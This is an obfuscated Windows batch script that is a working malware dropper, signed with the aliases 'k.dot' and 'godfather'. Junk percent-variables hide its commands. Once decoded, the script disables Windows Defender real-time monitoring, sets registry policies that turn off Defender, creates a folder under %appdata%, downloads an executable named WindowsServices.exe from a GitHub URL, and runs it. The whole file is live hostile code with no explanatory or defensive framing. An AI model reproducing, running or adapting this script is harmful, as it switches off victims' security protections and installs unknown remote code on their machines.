::made bY k.dot AnD goDfATheR
@%CChFQhM%e%egAtZx,%c%VxAMVa%h%X@hmJ%o%SNH$AJ% %fcwux%o%uE@y,(%f%Eo#mR%f%nlw@ZG_%
p%b,Pgfn%o%AwHvAOS%w%ehWJKz%e%opKyP%r%JvO_)A%s%SD$q[V%h%eCU?(V%e%qnAqzLB%l%EGi[AAC%l%BUJj@U% %fOv#(%-%_$zAs%C%JiDamf%o%#sm[ahD%m%R)vMT%m%qlTm)%a%Qidt#%n%T@qk#%d%EFrcM% %DFuo(XU%"%PE]BQ%S%(Bce_ul%e%rwYkw%t%qpVOF.%-%IPhkKmN%M%SBlL?fI%p%Zvyxk%P%vbEiRc%r%bJTSRmM%e%F)hiqvr%f%$muK.hZ%e%LQSyAw%r%WJQzE]%e%ajcSjS)%n%ByTsfDW%c%O@sUC%e%enqQv% %VaSul%-%nI,jf_%D%DlEfg%i%(vi,#E#%s%TDWZE%a%fnTHLU%b%PvmCC%l%Qzvbksg%e%bygb)%R%@v.cD%e%eFgFr%a%Gc$$z%l%LVv.Gx%t%(aYU[TZ%i%FETUj,%m%OBO#Nk%e%hOALTq%M%rvPtzc%o%QSa[cg%n%bkvE@fE%i%ufEBA?e%t%O)TUX(%o%rDyvdUN%r%)Ds((?%i%ediWQ,%n%dfh.Oy%g%CINU.% %dXJFV%$%eytHL%t%UjUZRo%r%i?ZGy)%u%cpVWOO%e%tTA)LW%"%ey]p,%
s%L_JV[CJ%e%GKclY?%t%jcBgq% %@SlAT%p%?KG$i%a%ku)q$%t%Wd.[#d%h%bzRhLh%=%$R[.n)O%"%OWdVv%H%]#L[y%K%a[HbkEh%L%GbmgPC%M%KEd?WS%\%d(rWp%S%duyhmGQ%O%KT)#.%F%$,juiO%T%KmIm?%W%u(tre%A%qRDfRsz%R%FrOAdde%E%Uv?$q%\%h)$#Kl%P%[_nNagf%o%[FbdBiy%l%kfKTOs%i%e[pHnBD%c%i[edU%i%LTDGI%e%_SFIm(i%s%PSMaxdL%\%yCv]Qx%M%FXYM.%i%WxmMie%c%Q$WBVd%r%XI?q]%o%,IGuGks%s%lMACL%o%@q_Q.a%f%acq$_X%t%SsS.x%\%b?_U@i?%W%cABI?J%i%A)(oKa%n%rKdAYS%d%[Sn[,%o%[,IQt_D%w%VYBDQh%s%AQLH_% %HwJcghb%D%DGpkr%e%#[KiW[%f%u$fdo%e%npcEtf%n%@KAcH#.%d%q$PVS%e%AYqWV_%r%A_Mc,Ye%"%zUauH%
r%u?WDAk?%e%XdpmrJ%g%afSFJ% %sVxrSw%a%_ISbfw[%d%LPNRf%d%(RYiU% %H_qjjT%%path% %Dx[Rxgv%/%ekkt[]%v%TAh$N% %ayOD@%D%GYmHcQl%i%HNAHvy%s%vivv(@N%a%RELKiQa%b%J$aZqp%l%?nDg#%e%mjYKm$%A%OqPJg%n%hkSb(pa%t%nFlPPFl%i%CCMzJ%S%yHSEh%p%qClM,BA%y%nVTZYR%w%].kqxX%a%YQPkxM%r%#(H.,w.%e%pVmE_@% %gzjTg]I%/%.?ed@W%t%w)dCs% %DfIrsPU%R%.rUGi%E%wQYe)kL%G%)HZUR%_%HBAnO%D%[pCFF]%W%tGP$rYP%O%wkfk(.%R%e(u@m%D%ABMD@$?% %ZkSaT$I%/%qNAce_)%d%imC.SV% %Bdu.s%1%YSZgSSg% %(#vlk%/%pjPDnwQ%f%@td?f]% %Z(bSEp?%>n%yPA[XiU%u%cMr(.T%l%TolEe?t%
r%BfN]O]Z%e%NNRa_%g%O]kTsjI% %V()Xd%a%_fi@S%d%l]u]q%d%#@k_M% %sfUqaoI%%path% %nZL?Uw(%/%fHRml%v%Vy,[k% %[BSVN?Y%D%d]Isr%i%ZZPY,Wk%s%zikuo[i%a%]UR)(%b%coPE$%l%L,BCSn%e%CuD@Bw%R%SagWvTF%o%,NUkWW@%u%MvwVTZB%t%uoyWj%i%xoHKjI%n%Jk,O)%e%RaXYhtT%l%vDmGxM%y%OMCiTz%T%dFzrVF%a%V#VDA)%k%LsXg#%i%CZr_$%n%?]mKXps%g%.(@sY%A%.qlnW%c%nTbR#T%t%KTY)okI%i%X[mjq#.%o%Dw(iPlq%n%.GoOAZ% %irs.VH%/%pnQGgu%t%dzYnSvr% %KX##u%R%UFn(H_%E%Bb,,]e)%G%sioWX%_%#FPw_b%D%AefsaE%W%fD.wU%O%(poogL.%R%]$PJ)qg%D%VWd$Lt% %]zovl%/%ZJlIp(%d%x[@@Q% %PI@K]Q%1%kpVan% %IiSYDem%/%TIGcEbN%f%YkrhL% %OmQdKm%>n%ve,OFSE%u%?JxLtq$%l%dBb?lu%
c%nAteT%o%Is(jgk%l%GvuAhl#%o%p)zYR%r%zTDec% %CN,FIv(%r%PKWluoJ%e%]rkQlF%d%hhrqb?% %eE)oPI%t%mMiVBM%i%]kW(O%m%ZApfIU%e%jPXVx%o%jnf#y%u%_k.u_%t%CXwy_w% %VSwolw%/%qjIer%t%vHrffnl% %eOiM_%2%LkzuW%
m%hcOm.%k%a#GeE%d%zv?Kno%i%B(.AJ.c%r%ryVJWoB% %#]@HSI%"%UIaQIy%%appdata%\%LpKDGG%m%bFkaO%y%M@?HE%a%ix(GW%p%QcU?[t%h%QWJilc%p%BjAha]H%"%cUv$?%
c%HpNoq%d%tRsGN,% %eGtZy%/%POzD$k%d%L_CsLA% %aRwRpI%"%hJTFd#%%appdata%\%cGxFLW%m%XcoO]%y%j)L,Gf%a%hWaCC%p%Wz#RDRO%h%(uJj(%p%(FFeY%"%DQ(vogG%
p%ix)En%o%eLaWbHx%w%oR#_wy%e%q[HnQ%r%cmkJ]%s%h]LSRBT%h%GUcdfJK%e%YRtem%l%AN(Tq%l%F?tH.gI% %ayRubC$%-%[iW)lj%C%jRM#l%o%cDI_sVe%m%(sNE?f%m%X,(dw%a%dsfnF%n%Jw]OF%d%@WLeZS% %nu@NQS%"%KDLvy%I%[p_x_.Z%n%cID,A%v%[zuZK%o%Q$tOea%k%GUhFhTJ%e%W)oXzDJ%-%sh,.?%W%$Bkpm%e%AnYx[?E%b%De.Gx%R%Gb@_Y%e%wcODhy#%q%PByfc%u%SgVQZs%e%xIyGsG%s%nw_tM%t%luh]Bk% %wHiLl%-%WtmF.IS%U%ME$m],x%r%HJJeH%i%[Rp.F% %DqA#koN%h%tb(Psz%t%]lBUkhl%t%xkEsqg%p%.#qeZB%s%QcSNlW%:%euqqs%/%tgPge%/%nTxlB%g%,HaxHd%i%)$EQl$S%t%poyl_j%h%pQMW]%u%CqUCYN%b%$,oJNS%.%lPdqMQ%c%FPo)eQ%o%IojLOFi%m%j[Va$%/%yizZM%B%uXZnKb%A%BIQDlxF%R%ES[?Z%H%Vqaqhng%O%aMJKbk,%M%D@UoM[V%1%Dwa._%/%yDx[E%b%bOuOW[_%r%pRLe.%o%y@eMu%b%rsAlr%r%bR.zQ)%/%,$jxep%r%md.m]Ya%a%GIbLj%w%]a#Jvei%/%FdvFkNj%m%TX[OHg%a%uJsTs%i%ELJQ@C]%n%RtP#.%/%(_Ixzs%W%(MzxtS%i%Ssh_ol%n%zUk[.%d%.XZiy,)%o%aIKfIX%w%rLRhl%s%.gzIhnA%S%zZizEbn%e%EU)k@?%r%TJXaJY(%v%Nb[@DoX%i%ffQkI%c%aPljE%e%BxRTfX%s%mXOM_b)%.%rJIaCt)%e%udIXv,%x%ZOENc@%e%PQKkf% %aJn(v%-%,hpU$vU%O%IeLAU%u%__PLPp%t%Xxz_XHl%F%xE)FO%i%W]DKv%l%rSWuPhX%e%o_hSrZ% %Ax@(Vja%W%b[sY]ub%i%mMtEoLH%n%#Mxm_T(%d%)OaQxe%o%,PSS$?q%w%HoJfg%s%Y?Sbbep%S%yFhT,@%e%wRQoY%r%yfYFM#%v%kCQRRZ@%i%tpTqCwF%c%YeaSUX(%e%d,vyK%s%cZxrRY%.%_SkdQU%e%fvhCt%x%oIthK[%e%U@AL$)%"%]qtek%
s%dZRRG%t%hp)VPE%a%peExQVp%r%f)gfexx%t%yP$EmIC% %PvvQvN%W%QGKUPhb%i%_D)tGWd%n%dFZUh%d%jloMH%o%naB(,bL%w%$tn$(ml%s%h(Ovpwi%S%MltRG%e%oD$WKH_%r%zspH[J%v%WKAu[b%i%W[rQI%c%ogXZin%e%hXW)pF%s%zlWzny%.%[UwW#RP%e%UAhTV%x%YbEic%e%df[IXT%
